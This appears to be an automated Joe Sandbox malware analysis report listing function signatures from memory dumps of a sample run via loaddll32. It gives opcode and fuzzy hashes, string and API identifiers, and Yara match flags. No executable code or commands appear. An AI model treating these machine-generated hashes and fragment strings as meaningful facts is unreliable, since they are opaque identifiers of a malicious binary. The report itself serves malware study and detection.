                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: +m$/ U$~6
                                                                                                                                                                                      • API String ID: 0-2643806746
                                                                                                                                                                                      • Opcode ID: bb5eba95951f9583b9d34671eb22a5b07bfbdc02d5690876d50cccd18f04e8bb
                                                                                                                                                                                      • Instruction ID: 1db5288ba949320bcb056d5b88540a45a89be8787d7904c384eed953645d95d2
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb5eba95951f9583b9d34671eb22a5b07bfbdc02d5690876d50cccd18f04e8bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E10E724083809FD365CF65D58AA5BFBF1FBD5744F50891EF29A8A220C7B28948DF42
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 5-.'$5[]$m
                                                                                                                                                                                      • API String ID: 0-734274072
                                                                                                                                                                                      • Opcode ID: ad705e74ded13d09429c303057e8fe5634c02c1ab6073cf6bf7415ff0aa5ef85
                                                                                                                                                                                      • Instruction ID: b8c0abebf744f7face641e0ba96fbceca402e6b36367049f2fe2ddd10882fb27
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad705e74ded13d09429c303057e8fe5634c02c1ab6073cf6bf7415ff0aa5ef85
                                                                                                                                                                                      • Instruction Fuzzy Hash: 31C131B15183819FD759CF26C48A91FBBF5FBC4348F204A1DF1968A260D7B08949CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 3^"$F$\4
                                                                                                                                                                                      • API String ID: 0-424740036
                                                                                                                                                                                      • Opcode ID: a774ad6e8be1d582807efba01b14980a9fd2267765f6a6b5ce1645828d7aa525
                                                                                                                                                                                      • Instruction ID: 12a1ef43424493d74169669dbf26702045b7eee58f9b3cb0d577ea74a4db902b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a774ad6e8be1d582807efba01b14980a9fd2267765f6a6b5ce1645828d7aa525
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AB142725083809FC359CF29C48A91BFBE1FBC8758F108A2DF59996260D7B5CA49CF42
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E9D9DB6
                                                                                                                                                                                      • {recursion limit reached}{invalid syntax}, xrefs: 6E9D9FC2
                                                                                                                                                                                      • <>()C,, xrefs: 6E9D9DED
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: <>()C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${recursion limit reached}{invalid syntax}
                                                                                                                                                                                      • API String ID: 0-2241449410
                                                                                                                                                                                      • Opcode ID: 5d19aea1db5acb8d9ae0f5ac6def9e496fc186db7eadb6d3a18044e34c263757
                                                                                                                                                                                      • Instruction ID: e19e94e50f5456b5f0c4f904b877f2933267127bf44cf0da1cb8af9919b5bf90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d19aea1db5acb8d9ae0f5ac6def9e496fc186db7eadb6d3a18044e34c263757
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC81E330608F224FE725DEA9C0607A6B7EA9F86344F04C92DD49A8B255D7B5D8CD8F11
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: _W$bL0$<
                                                                                                                                                                                      • API String ID: 0-458269699
                                                                                                                                                                                      • Opcode ID: 4a44b99beb94c7fb9182986a263aa726065e7772d174d452e49dac74d56dcc6a
                                                                                                                                                                                      • Instruction ID: 0b8ab84e44fe6281373d8de2e3bfa5c305772ff54512da0b7a5ee06ce9876e62
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a44b99beb94c7fb9182986a263aa726065e7772d174d452e49dac74d56dcc6a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E8130B25083819FC355CF25C88581BBBF2FBC4758F504A1EF6969A260D3B6DA498F43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 4?$TY#$,9
                                                                                                                                                                                      • API String ID: 0-2698369630
                                                                                                                                                                                      • Opcode ID: c374265c888ef4ea721f1e1f90a6bfd18af9f169c7ef1242d4c59883bfc453aa
                                                                                                                                                                                      • Instruction ID: f231fd61d9f2a54f641079039cb19767c3004e78d4136f11dcd887a0a4a075e6
                                                                                                                                                                                      • Opcode Fuzzy Hash: c374265c888ef4ea721f1e1f90a6bfd18af9f169c7ef1242d4c59883bfc453aa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C7155B25083429BC759CF22D98681BBBF5FF94358F100A1EF18696261D772DA49CF83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: /.$l$at
                                                                                                                                                                                      • API String ID: 0-2847909692
                                                                                                                                                                                      • Opcode ID: 31a58317aa8a8e5bc13c553521d14c7f1b809e8220723032f0a27305d0284570
                                                                                                                                                                                      • Instruction ID: a19c1338b788e2eac042a054a34a6c9d0af8566272fb1cdbb5a07ccf553006e9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 31a58317aa8a8e5bc13c553521d14c7f1b809e8220723032f0a27305d0284570
                                                                                                                                                                                      • Instruction Fuzzy Hash: DF7130710083409FC799DF65C88981BBFE2FBC5758F404A0DF29A9A220D3B58A59CF87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: !e4$O*$Qm'
                                                                                                                                                                                      • API String ID: 0-765253384
                                                                                                                                                                                      • Opcode ID: 6c18fd2bc8357949007d3394de4fc677b21f9668ad150dc7b1f0acf317e49187
                                                                                                                                                                                      • Instruction ID: 64559891ebee7a88a36bb580d46a9adeb6da407c6ab128cbca2dde8388613b7f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c18fd2bc8357949007d3394de4fc677b21f9668ad150dc7b1f0acf317e49187
                                                                                                                                                                                      • Instruction Fuzzy Hash: 27519F726087019BD715DF26D94581FBBE2FFC8708F144A2EF586A6260D375DA0ACB83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 7|K$Ms*$P-
                                                                                                                                                                                      • API String ID: 0-841752872
                                                                                                                                                                                      • Opcode ID: 9546aa6f253813b6ff024f5ec6af619d04695e316f90b4ad53f1beac47a41b7f
                                                                                                                                                                                      • Instruction ID: 9f3901535f44fc002f15561420b4d888ed052e5f85ddbc33e12cd00a4cae1541
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9546aa6f253813b6ff024f5ec6af619d04695e316f90b4ad53f1beac47a41b7f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E518571508341DFC359CF25D48642BBBE1FBC4368F505A2EF6959A2A1E370CA4A8F87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0uk$d1f$jN
                                                                                                                                                                                      • API String ID: 0-1634662418
                                                                                                                                                                                      • Opcode ID: 2ed6974f9bc777f8b13fa5ff8d557c1f9ab6aed86fb500707cdd080a82b76788
                                                                                                                                                                                      • Instruction ID: 8179200257841c2bdec52dc633166db3214b098234a3750d2ca35026dffcd50d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ed6974f9bc777f8b13fa5ff8d557c1f9ab6aed86fb500707cdd080a82b76788
                                                                                                                                                                                      • Instruction Fuzzy Hash: E04102B2C0131AEBCB49CFE5D94A4EEBBB1BB48314F208558D411B6250D7B95B48CFA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: "wLA$\vQ$*
                                                                                                                                                                                      • API String ID: 0-1256145968
                                                                                                                                                                                      • Opcode ID: 076f378f5647f6e6c252d3c50267c8e1af6b72d15b40064b42b9ad85becc2be7
                                                                                                                                                                                      • Instruction ID: ffc51fa85b9a31dc599a06f4ff5e7ba4ccf49a4fe802ca3a7f31b53d11737d68
                                                                                                                                                                                      • Opcode Fuzzy Hash: 076f378f5647f6e6c252d3c50267c8e1af6b72d15b40064b42b9ad85becc2be7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 503101B1D00329EBCF09CFA5D98A4EEBFB1FB44314F208298D515B6260D3745A05DF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                                                                                      • String ID: <unknown>
                                                                                                                                                                                      • API String ID: 1617791916-1574992787
                                                                                                                                                                                      • Opcode ID: 4eb9eba3d2ee750b4e53b7361a074397fd9b687a61de90b2b9127106a4edbd58
                                                                                                                                                                                      • Instruction ID: ac69df2c0f20a899ac2b45bd580cff1ec75433bd8dc17885fe1fd878af550867
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4eb9eba3d2ee750b4e53b7361a074397fd9b687a61de90b2b9127106a4edbd58
                                                                                                                                                                                      • Instruction Fuzzy Hash: F1629970E042698FDF16CFE8C8907DDBBB2AF49304F1881A9D949B7642EB309985CF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ?${invalid syntax}
                                                                                                                                                                                      • API String ID: 0-3691751180
                                                                                                                                                                                      • Opcode ID: 0566e1cebef9382eadfc922ee0233bcb5bde5b380244975cb53b0cfa5387addc
                                                                                                                                                                                      • Instruction ID: 5052244c0782cd95f9dced51fc5cc1486cadcd2272cb4f6d305b40e52b3b4017
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0566e1cebef9382eadfc922ee0233bcb5bde5b380244975cb53b0cfa5387addc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BB12832618B368FC7058EAAC490669B7A6EF87340F04C71EE8E55B251D731D88ECF41
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E9D66F9
                                                                                                                                                                                      • {invalid syntax}, xrefs: 6E9D697D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${invalid syntax}
                                                                                                                                                                                      • API String ID: 0-903684146
                                                                                                                                                                                      • Opcode ID: 94ddb2c61f490709b9d3c53f36d04d0dd172c8f8b7ff397737a1fe96fbeb5a79
                                                                                                                                                                                      • Instruction ID: 2ecc91126c209b4243a1dcc65aabefe633c6b6ec229bd1c819a953534a3a3e4d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 94ddb2c61f490709b9d3c53f36d04d0dd172c8f8b7ff397737a1fe96fbeb5a79
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13814975768F264FEB648EE6856036673E66F81324F14C82CC89A4B747D664E48DCF03
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: RSrG$?h
                                                                                                                                                                                      • API String ID: 0-3757341021
                                                                                                                                                                                      • Opcode ID: b2322cef8445787a4f844954aa2255ad5b27f8ca0ee112432e6877cadbb92aac
                                                                                                                                                                                      • Instruction ID: 8ebb15d2eed316e9d1271019c1de680864e4e915e09916508204728bd577251f
                                                                                                                                                                                      • Opcode Fuzzy Hash: b2322cef8445787a4f844954aa2255ad5b27f8ca0ee112432e6877cadbb92aac
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF9111725083819FC759CF61C98A91BFFF1FBD4758F10491DF28586220C3B6CA598B82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: (u$wU
                                                                                                                                                                                      • API String ID: 0-793206181
                                                                                                                                                                                      • Opcode ID: 44941c13af38695c119ab501717e2bca1946c7f9e17c669ffd79fdad769819a5
                                                                                                                                                                                      • Instruction ID: f22982ce281e96307b54d5e47c49c8d07e4e8b56805a49e66ad37b6041062c9c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 44941c13af38695c119ab501717e2bca1946c7f9e17c669ffd79fdad769819a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: D7818772508301DFC359CF21C98A42BBBF1EBD8758F50991EF6965A2A0D7B4CA09CF46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                      • String ID: jo$pl.d
                                                                                                                                                                                      • API String ID: 1586166983-342083115
                                                                                                                                                                                      • Opcode ID: a80b5a84d545ae0aad8162d07edeaaa79629c5832eb4166d35a087e10215b4f7
                                                                                                                                                                                      • Instruction ID: 0a9fc30be8e82f6393826f9e8343e517da84a017a7c9cfd4e5ac6ad2f11878a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: a80b5a84d545ae0aad8162d07edeaaa79629c5832eb4166d35a087e10215b4f7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8181FE72D0020DEBCF18CFE5D98A8EEBBB2FB44318F208159E511BA260D7B55A59CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Ep?$`B
                                                                                                                                                                                      • API String ID: 0-215957162
                                                                                                                                                                                      • Opcode ID: 37f7898bf24b10ac593bc78407a84c4a46cbb4861d575479d130bcf19bb0ad91
                                                                                                                                                                                      • Instruction ID: cf81d4ca20e720ecd2996b49f06334d3aed4ea3c3065fb43b1eabb03a847e775
                                                                                                                                                                                      • Opcode Fuzzy Hash: 37f7898bf24b10ac593bc78407a84c4a46cbb4861d575479d130bcf19bb0ad91
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B5167729083419FC355DF25D98941FFBF4BB88718F104A2EF9E56A260D7748A098B87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 4T @$;E
                                                                                                                                                                                      • API String ID: 0-2491102183
                                                                                                                                                                                      • Opcode ID: 24616a58aed0bfa372fbe39ad80e346f9f5182c75cd0cf8cea95a7062eab24d5
                                                                                                                                                                                      • Instruction ID: efae7770c53a7096cc0613974102cf22563292510a611ba2d7e790be74c03fa4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 24616a58aed0bfa372fbe39ad80e346f9f5182c75cd0cf8cea95a7062eab24d5
                                                                                                                                                                                      • Instruction Fuzzy Hash: A65189B25083419FD309CF25E58A41BBBE1FBC4758F508A1EF0896A260D7B1CA49CF97
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: =7u/$=7u/
                                                                                                                                                                                      • API String ID: 0-275303271
                                                                                                                                                                                      • Opcode ID: 8530d04e476c140368df46f992baf698f08361401b70fc2bcd0d2f32e959b2ef
                                                                                                                                                                                      • Instruction ID: 8ba2d9ccfe85bc80ffacb98d6fc36f2647e6e9068ad9fcb37b567680881afaa5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8530d04e476c140368df46f992baf698f08361401b70fc2bcd0d2f32e959b2ef
                                                                                                                                                                                      • Instruction Fuzzy Hash: B95198725083419FD34ADF20948581FBBE5FBD8398F504A1DF68A9A220D3758A49CF83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 50$`F
                                                                                                                                                                                      • API String ID: 0-2597214580
                                                                                                                                                                                      • Opcode ID: 0364f6d1653c4bde0a341bef7ef3f32b1fe62a687ceb0c490c78cd4738c8066f
                                                                                                                                                                                      • Instruction ID: 5c799de694a109a5015005105599fb90bbbc91f691d30f7a13916376a32c006e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0364f6d1653c4bde0a341bef7ef3f32b1fe62a687ceb0c490c78cd4738c8066f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5136725083429FC746CF22D88581FBBE5FBD8348F504A1DF59696260D7B5CA0A8F87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: yXw$!\
                                                                                                                                                                                      • API String ID: 0-755724215
                                                                                                                                                                                      • Opcode ID: cb2aad42a2071c3fc007c5333c96826ba7048416c655adc2190aef0a4a1fb8c3
                                                                                                                                                                                      • Instruction ID: a9e05927c6db83518f2c788f92a979a733560c9f4207e2060ca028e157ad582c
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb2aad42a2071c3fc007c5333c96826ba7048416c655adc2190aef0a4a1fb8c3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 46410072D0030DEBCF04DFA5D94A8EEBBB5EF84314F20819AD411B6260D7B91A55CFA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 1VC$HRG
                                                                                                                                                                                      • API String ID: 0-1729148703
                                                                                                                                                                                      • Opcode ID: d91384db02164864f113f243955d1fa5785661b934d34a94043782ee8d1840ae
                                                                                                                                                                                      • Instruction ID: 53036a3cb4c00f58d09e6a1f83c1ca91bd7fefe6b201718ae171e2d7bab50679
                                                                                                                                                                                      • Opcode Fuzzy Hash: d91384db02164864f113f243955d1fa5785661b934d34a94043782ee8d1840ae
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19316C72908341CFC318DE26D94941FBBE1EBD4718F058A5EF898AB250D3B59D0ACF96
